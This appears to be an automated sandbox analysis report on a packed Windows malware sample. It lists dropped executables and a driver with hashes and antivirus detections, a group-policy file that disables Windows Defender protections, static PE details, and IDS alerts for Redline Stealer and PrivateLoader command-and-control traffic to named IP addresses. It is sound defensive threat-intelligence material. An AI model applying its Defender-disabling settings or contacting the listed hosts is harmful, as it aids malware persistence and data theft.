File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	529408
Entropy (8bit):	6.8395911848628215
Encrypted:	false
SSDEEP:	6144:NMovNCQsumdw5sK+5Zo6dpMDWI8Ua69Wipob:S0Nydw5s306dpM/CCpo
MD5:	B8D875D94FBD7DF91B1DBBBC308A057F
SHA1:	517CC89E653FA1A90DA8ED5FB5E5068673F43589
SHA-256:	B950BA1E7368756512FB9C1C8210E4282B3705AB3A7FE1E134C01B397905A674
SHA-512:	127AC147D6C0A0DC130D92E20DB83591C040AF5931578623A0CA61F7A3F495B0E3B9FB83C0F81E81AD7E53E6775BC9C7EADE5D8272F96C5B28D15986FB92E9D2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.K...............0..............g... ...@....@.. ....................................@.................................Hg..O....@.......................`......,g............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	964096
Entropy (8bit):	6.7500511544674495
Encrypted:	false
SSDEEP:	12288:pX8RkdnkRZOwECM98hfcunLIYCx28xur5GbYkpMalQBEnxSSraaoKZ2A:SRPRAqM98qCRCxnx7YpauBML
MD5:	F5B93D3369D1AE23D6E150E75D2B6A80
SHA1:	6F6914770748AD148154E1576D9C6FE6887F2290
SHA-256:	343EA56746B6F08C7ECCBFBB9FE1A544952A9A933140C677179F4F8C7BB60B81
SHA-512:	DCEDAED2DF62386B980CC1957F224FC48224AEB0F5BF8D0241ACC7A0A552B0AE90697ED333189963540F8391CBECFA0977A8685723C5025C9A4F95918032CF1E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n~W................................. ........@.. ....................... ............`.................................P...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..........tF..............................................................J........_.................E...h........=...1..4%..b............................fi..Ih..Hl......(....o..b....A..ci...[..K.......%........$.......c..Q#.......\|...i..........`....%...]..........RW..O...1....].......Z...c..T................I..J&..Mg......x.......6\......H...7..................../..A9..x...........7.......@...~...........X...y^..E...9...4[..om..$....x...X......xV..;...............O...

C:\Users\user\Documents\piratemamm\es8d8QFs55NSPEWre6A8WVgP.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	93
Entropy (8bit):	4.647722425298617
Encrypted:	false
SSDEEP:	3:qVZqcMsMgs0UL3AE+FoJRx+QVBK3D:qzsgs0HE+2XVBmD
MD5:	B0D506893D4802090EDF1644F5F082CD
SHA1:	4BF0D7ECB70703857C7029754FA02A7496313B63
SHA-256:	0D3E98CA727FC1201B436170AF5A63F23348AAF146A3AC6234F6C4DA283E8B34
SHA-512:	9A104D02DD1AFB7B1D7C26715FA650C3F1519744AF8F57A57C1A8D39A1D75B16D3CA5DA8E6E00966EBE2D73A9983679710585318ACFED67804C4856B6D1928E5
Malicious:	false
Reputation:	unknown
Preview:	<html><body><h1>403 Forbidden</h1>.Request forbidden by administrative rules..</body></html>.

C:\Users\user\Documents\piratemamm\gGYwIv9Yk9sB1abtIV19M1nc.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	HTML document, ASCII text, with very long lines (6927)
Category:	dropped
Size (bytes):	536871
Entropy (8bit):	5.366271969088097
Encrypted:	false
SSDEEP:	12288:ga/EqMktwIB8rIwJ0rAmv8XznrKCrX/WCM2dwqM0eqllupBnI7674:g8EqkznrKieCM2dwqM0eqllWg
MD5:	B1F5EC981DA2C480A691840A773A0BC1
SHA1:	6AFC1A31B0CD08C2440A17446FE7552CE26B9C4F
SHA-256:	5E612AE5984D8413DF0ACFC06E821E952E5F8D39B9C1D6F60FB4E29E0FA69596
SHA-512:	D45002A7E8D88B29D628C0A2E883BF7BD54D20D82D48A10E87BBF245BD549F53C8006E45D8684EAF4DBCDDF78BA08E7963D95BE6367AD011E46213E05FF96653
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>. <html lang='en' dir='ltr'>. <head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />.<link rel="preconnect" href="https://login.vk.com" />.<link rel="preconnect" href="https://api.vk.com" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error \| VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>;try{(function(){"use strict";function e({needRedi

C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10590720
Entropy (8bit):	7.970373644459469
Encrypted:	false
SSDEEP:	196608:V+Zh8TZ4EwkJcPAyxxycUgqToe0ERIdBxZC7dmmvYGW8Jv:jrhutxSgWPcxZCJNL
MD5:	488D85695B6E76307AA595F8DB6A48FC
SHA1:	63F7682DD687A55D1AE0000B242C06CF334A7534
SHA-256:	433CED4F31E8BFB3F0C02FE88255D4FC109C8BC2F4D8BD51EAE700CFF631D191
SHA-512:	B106C3E8153F5A974C5751BB44A4056E33C185FDB825293A4F583E9BAAD0C168B43A67A20BA4474885D7DBC4F4CA75C7896378C61D95399C739FDCCE204EF9C1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\.f..........#.................O`V........@.............................P............ ..................................................=W.<....@......@...`*............................................].(.......8............... ............................text...v~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..S.%......................... ..`.text1..X...........................@....text2..............................`..h.rsrc........@......................@..@........................................................................................................................................................................................................................

C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3097600
Entropy (8bit):	6.278586127519849
Encrypted:	false
SSDEEP:	49152:u2LuWAXniueagRswaRfZ/G+eUmOpw80D:uWta28AOpw
MD5:	BA027CCB7DE0F4A3769F48136D183DBD
SHA1:	A7CDD10733D1064A143001DE087F0565AE116E0B
SHA-256:	4CB86D1B9775321A7F8ED4F751E3ECE271402E0BE07070F72E68DF038877DC8E
SHA-512:	331B6311E44E74D0EB4DF9718F0DFB9E79453ECA26677C53E8E6BC76F2A3633ECBE60119AB07702A9ECE7747D86ABFD6D6201081F21E59920D2CA48D6436A7F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........+..................6......@.............@...........................0...............................................-.r....................................................................................................................text...-...........................`..`.data....j.......6..................@.../4...........@.........................B/18..........P.........................B/30.........0 ........................B/43...........!......T ................B/59.....$2...."..4...2!................B/75.....7.....#......f"................B/94.....Q,....#......h"................B/106.....a... -..b....+................B.idata..r.....-.......+.............@....symtab..F....-..H....+................B................................................................................................................................................

C:\Windows\Logs\StorGroupPolicy.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	30351
Entropy (8bit):	4.9115085026703325
Encrypted:	false
SSDEEP:	768:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrt5X0SHgHgZgZgUgUi/1OkGk1/pprYHHH1v:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrte
MD5:	4173BF0753DA5A955D8E32162E8A24DD
SHA1:	635DB9DB470CCE87C6DB4EB17E4B1880B27C7395
SHA-256:	FE7681BFB08CBB5CEDADCD0C80FAE1CC2D55707D94E7D3E9D6FD9C3A46D02F47
SHA-512:	18C6858B6B18105765139A800ED8FDA364BBB0D752FACB53307A3DB8B0AE1A3EE07F6FF64DF85A8B1391BB29729630003E5B079B4976942E162212D71E9EA621
Malicious:	false
Reputation:	unknown
Preview:	10/03/2023 7:55:56.00000693:RegEnumKeyExW failed with (259)..10/03/2023 7:55:56.00000693:GP object initialized successfully..10/03/2023 7:55:56.00000756:Deny_All not set for all. Will query other 6 GUIDs..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Deny_All for all devices is being reset..10/03/2023 7:55:56.00000787:Will delete security for disk..10/03/2023 7:55:56.00000787:Volume interface name \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..10/0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	1926
Entropy (8bit):	3.310422749310586
Encrypted:	false
SSDEEP:	24:wSLevFeSLe5BeSwbv5qweSw4q7j/eScdepWDbVeScden2W8eScdemevtmeScdeRg:KFIBkbv5qwk4qfKV2QxVCZ
MD5:	CDFD60E717A44C2349B553E011958B85
SHA1:	431136102A6FB52A00E416964D4C27089155F73B
SHA-256:	0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
SHA-512:	DFEA0D0B3779059E64088EA9A13CD6B076D76C64DB99FA82E6612386CAE5CDA94A790318207470045EF51F0A410B400726BA28CB6ECB6972F081C532E558D6A8
Malicious:	false
Reputation:	unknown
Preview:	PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.

C:\Windows\System32\GroupPolicy\gpt.ini

Download File

Process:	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	127
Entropy (8bit):	5.080093624462795
Encrypted:	false
SSDEEP:	3:1ELGUAgKLMzY+eWgTckbnnvjiBIFVTjSUgf4orFLsUov:1WsMzYHxbnvEcvgqv
MD5:	8EF9853D1881C5FE4D681BFB31282A01
SHA1:	A05609065520E4B4E553784C566430AD9736F19F
SHA-256:	9228F13D82C3DC96B957769F6081E5BAC53CFFCA4FFDE0BA1E102D9968F184A2
SHA-512:	5DDEE931A08CFEA5BB9D1C36355D47155A24D617C2A11D08364FFC54E593064011DEE4FEA8AC5B67029CAB515D3071F0BA0422BB76AF492A3115272BA8FEB005
Malicious:	true
Reputation:	unknown
Preview:	[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]..Version=1..

C:\Windows\Temp\yqyegvqciyid.sys

Download File

Process:	C:\ProgramData\xprfjygruytr\etzpikspwykg.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

\Device\Mup\user-PC\PIPE\samr

Download File

Process:	C:\Program Files (x86)\NetVoyager\nv.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.053374040827532
Encrypted:	false
SSDEEP:	3:rmHD/tH//lllLGlA1yqGlgZty:rmH2oty
MD5:	080E701E8B8E2E9C68203C150AC7C6B7
SHA1:	4EF041621388B805758AE1D3B122F9D364705223
SHA-256:	FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
SHA-512:	C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79
Malicious:	false
Reputation:	unknown
Preview:	........t.......................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......,..l..@E............

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.948905391242038
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe
File size:	4'467'712 bytes
MD5:	a412795f68e5dae5fbae528595b96916
SHA1:	e2f386ce478fbad462a873e656eea85dce550815
SHA256:	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f52fc0b1b37d1040401d0
SHA512:	280a5f35ea216eae4c9d5dff2031af90caed46ba9cf62fc1daf46a34249e141d7f50677ab6245356cad771c0874227f7fe751fb38a43d198b6ab1163b60c9eea
SSDEEP:	98304:S6CCEFu6ZDeJ66CIydoPrNtcEVTyv6VSfj4bDLTbnK+H9:lNeTZDeEvajNavXfsnLnK+H
TLSH:	DD2623CA258296F8D40BC7F0C0652CAD31697FFBDE744DAA36857E630EF35101E66682
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....'.f.........."....'.....T.......Qv........@....................................,PD...`................................

File Icon


Icon Hash:	0e3921180a4a6271

Static PE Info

General

Entrypoint:	0x1407651d5
Entrypoint Section:	.vmp/TC
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66AF27BA [Sun Aug 4 07:03:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	82a1160ea6d4db9ad17aacb065a21868

Entrypoint Preview

Instruction
inc ecx
push ebp
dec ecx
mov ebp, 9739ECACh
sbb bh, bl
mov eax, dword ptr [4950415Ch]
mov eax, D09DB9BFh
mov cl, 5Bh
lodsd
mov edi, 246C8B4Ch
or byte ptr [eax-39h], cl
inc esp
and al, 08h
dec eax
ret

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ed980	0xa0	.vmp/TC
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7ff000	0x20002	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x7f20f0	0xa23c	.vmp/TC
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7fd000	0x1554	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x761fb8	0x28	.vmp/TC
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7f1fb0	0x140	.vmp/TC
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3db000	0x778	.vmp/TC
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11f4ee	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x121000	0x32712	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x154000	0x84c8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x15d000	0x75fc	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x165000	0x1f4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.vmp/TC	0x166000	0x274526	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp/TC	0x3db000	0xae8	0xc00	530996a8d4e9333380bd3345bc03826d	False	0.2958984375	data	2.3644090310654	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp/TC	0x3dc000	0x42032c	0x420400	ff5d05ed7aa4688c99a88eb69f492f8b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x7fd000	0x1554	0x1600	85611730f13b036829a2b20480eea7eb	False	0.19406960227272727	data	5.455869295611961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x7ff000	0x20002	0x20200	bd894bc3a8612f2263a5c4c31da2ecfb	False	0.5525823808365758	data	6.307860468297147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x7ff238	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m	0.45379924953095685
RT_ICON	0x8002e0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m	0.4036307053941909
RT_ICON	0x802888	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m	0.28154205607476634
RT_ICON	0x8130b0	0xb458	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	1.0000433200485184
RT_ICON	0x81e508	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	0.42473118279569894
RT_ICON	0x81e7f0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	0.35618279569892475
RT_GROUP_ICON	0x81ead8	0x3e	data	0.8225806451612904
RT_GROUP_ICON	0x81eb18	0x14	data	1.25
RT_GROUP_ICON	0x81eb30	0x14	data	1.25
RT_MANIFEST	0x81eb48	0x4ba	XML 1.0 document, ASCII text, with CRLF line terminators	0.46859504132231405

Imports

DLL	Import
KERNEL32.dll	InitializeCriticalSectionEx, CreateMutexA, lstrcatA, GetModuleHandleA, SetCurrentDirectoryA, Sleep, GetModuleHandleExA, GetFileAttributesA, GetBinaryTypeA, lstrcpyA, FindClose, VerSetConditionMask, WideCharToMultiByte, VerifyVersionInfoW, CreateProcessA, GetSystemTimeAsFileTime, HeapFree, lstrlenA, HeapAlloc, GetProcAddress, lstrcpynA, GetProcessHeap, WriteConsoleW, CloseHandle, CreateFileA, GetLastError, CreateFileW, WriteFile, SetFileAttributesA, ReadFile, HeapSize, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, InitializeSListHead, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, LocalFree, FindFirstFileExW, FindNextFileW, MultiByteToWideChar, QueryPerformanceFrequency, LCMapStringEx, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, GetCPInfo, GetStringTypeW, SetLastError, GetCurrentThread, GetThreadTimes, RtlUnwindEx, InterlockedPushEntrySList, RtlPcToFileHeader, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, SetFilePointerEx, GetFileType, GetCurrentProcess, ExitProcess, TerminateProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, GetConsoleMode, ReadConsoleW, GetConsoleOutputCP, SetStdHandle, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, SetEndOfFile, GetFileSizeEx, FlushFileBuffers, HeapReAlloc, RtlUnwind
USER32.dll	GetCursorPos, CharNextA
ADVAPI32.dll	RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, CryptReleaseContext
SHELL32.dll	SHGetFolderPathA, ShellExecuteA
ole32.dll	CoCreateInstance, CoInitializeSecurity, CoInitializeEx, CoUninitialize
OLEAUT32.dll	VariantClear, SysAllocString, SysFreeString
KERNEL32.dll	GetSystemTimeAsFileTime, CreateEventA, GetModuleHandleA, TerminateProcess, GetCurrentProcess, CreateToolhelp32Snapshot, Thread32First, GetCurrentProcessId, GetCurrentThreadId, OpenThread, Thread32Next, CloseHandle, SuspendThread, ResumeThread, WriteProcessMemory, GetSystemInfo, VirtualAlloc, VirtualProtect, VirtualFree, GetProcessAffinityMask, SetProcessAffinityMask, GetCurrentThread, SetThreadAffinityMask, Sleep, LoadLibraryA, FreeLibrary, GetTickCount, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFree, HeapAlloc, HeapFree, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, MultiByteToWideChar, GetModuleHandleW, LoadResource, FindResourceExW, FindResourceExA, WideCharToMultiByte, GetThreadLocale, GetUserDefaultLCID, GetSystemDefaultLCID, EnumResourceNamesA, EnumResourceNamesW, EnumResourceLanguagesA, EnumResourceLanguagesW, EnumResourceTypesA, EnumResourceTypesW, CreateFileW, LoadLibraryW, GetLastError, FlushFileBuffers, FlsSetValue, GetCommandLineA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, DecodePointer, FlsGetValue, FlsFree, SetLastError, FlsAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, RaiseException, RtlPcToFileHeader, RtlUnwindEx, LCMapStringA, LCMapStringW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, QueryPerformanceCounter, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteFile, SetFilePointer, GetConsoleCP, GetConsoleMode, HeapReAlloc, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-10T16:13:18.201200+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:13:00.116047+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49762	46967	192.168.2.4	45.9.91.71
2024-08-10T16:12:14.209789+0200	TCP	2054709	ET MALWARE PrivateLoader CnC Activity (GET)	1	49731	80	192.168.2.4	147.45.47.169
